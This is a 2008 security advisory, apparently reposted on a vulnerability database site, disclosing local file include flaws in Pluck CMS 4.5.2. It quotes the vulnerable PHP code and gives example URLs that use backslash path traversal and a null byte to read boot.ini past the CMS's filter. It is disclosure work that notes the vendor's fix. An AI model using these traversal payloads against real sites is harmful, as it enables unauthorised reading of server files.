Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2

2008.08.28
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-037 Application: Pluck CMS Versions Affected: 4.5.2 Vendor URL: http://www.pluck-cms.org/ Bug: Multiple Local File Include Exploits: YES Reported: 28.07.2008 Vendor Response: 03.08.2008 Solution: YES Date of Public Advisory: 25.08.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Pluck CMS has Multiple Local File Include vulnerabilities. Details ******* 1. Local File Include vulnerabilities found in script data/inc/themes/predefined_variables.php Vulnerable GET parameters "blogpost", "cat" and "file". First discovered by AmnPardaz Security Research Team [http://www.bugreport.ir/index_48.htm]. Vendor fixed vulnerability in version 4.5.2 by blocking directly access to this file [http://www.pluck-cms.org/releasenotes.php#4.5.2]. However, attacker still can exploit this vulnerability from index.php file. Code [line 15-46] ----------------- ################################################# //Make sure the file isn't accessed directly if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){ //Give out an "access denied" error echo "access denied"; //Block all other code exit(); } //Include Translation data include ("data/settings/langpref.php"); include ("data/inc/lang/$langpref"); //Get Site-title $sitetitle = file_get_contents("data/settings/title.dat"); //Get the page-data $filetoread = $_GET['file']; $album = $_GET['album']; $blogpost = $_GET['blogpost']; $cat = $_GET['cat']; if (($filetoread) && (file_exists("data/content/$filetoread"))) { include "data/content/$filetoread"; } elseif ($album) { $title = $album; } elseif (($blogpost) && (file_exists("data/blog/$cat/posts/$blogpost"))) { include("data/blog/$cat/posts/$blogpost"); } elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) { $title = $lang_front1; $content = $lang_front2; } ################################################# Pluck CMS has security module that checks for hacking attempts and blocks them. Code ---- ################################################# //Remote File Inclusion //Check for strange characters in $_GET keys //All keys with "/" or ":" are blocked, so it becomes virtually impossible to inject other pages or websites foreach ($_GET as $get_key => $get_value) { if ((ereg("/", $get_value)) || (ereg(":", $get_value))) { eval("unset(\${$get_key});"); die("A hacking attempt has been detected. For security reasons, we're blocking any code execution."); } } ################################################# This vulnerability can be exploited only on systems that accept backslash as a path separator. Example: http://[server]/[installdir]/index.php?file=..\..\..\..\..\..\..\..\..\. .\..\..\..\boot.ini http://[server]/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\ ..\..\..\..\..\boot.ini http://[server]/[installdir]/index.php?blogpost=DSecRG&cat=..\..\..\..\. .\..\..\..\..\..\..\..\..\boot.ini%00 2. Local File Include vulnerabilities found in script data/inc/blog_include_react.php Vulnerable GET parameters "blogpost" and "cat". Code [line 15-30] ----------------- ################################################# //Make sure the file isn't accessed directly if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){ //Give out an "access denied" error echo "access denied"; //Block all other code exit(); } //Predefined variable $blogpost = $_GET['blogpost']; $cat = $_GET['cat']; $pageback = $_GET['pageback']; list($reactiondir, $extension) = explode(".", $blogpost); //Include the blogpost include("data/blog/$cat/posts/$blogpost"); ################################################# Attacker can exploit vulnerability from index.php file. This vulnerability can be exploited only on systems that accept backslash as a path separator. Example: http://[server]/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\ ..\..\..\..\..\boot.ini http://[server]/[installdir]/index.php?blogpost=DSecRG&cat=..\..\..\..\. .\..\..\..\..\..\..\..\..\boot.ini%00 Solution ******** Vendor fix this flaw on 22.08.2008. New version of Pluck CMS 4.5.3 can be download here: http://www.pluck-cms.org/download.php Release notes: http://www.pluck-cms.org/releasenotes.php#4.5.3 About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian)

References:

http://www.securityfocus.com/bid/30820
http://www.securityfocus.com/archive/1/archive/1/495706/100/0/threaded
http://www.pluck-cms.org/releasenotes.php#4.5.3
http://www.milw0rm.com/exploits/6300
http://secunia.com/advisories/31607


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top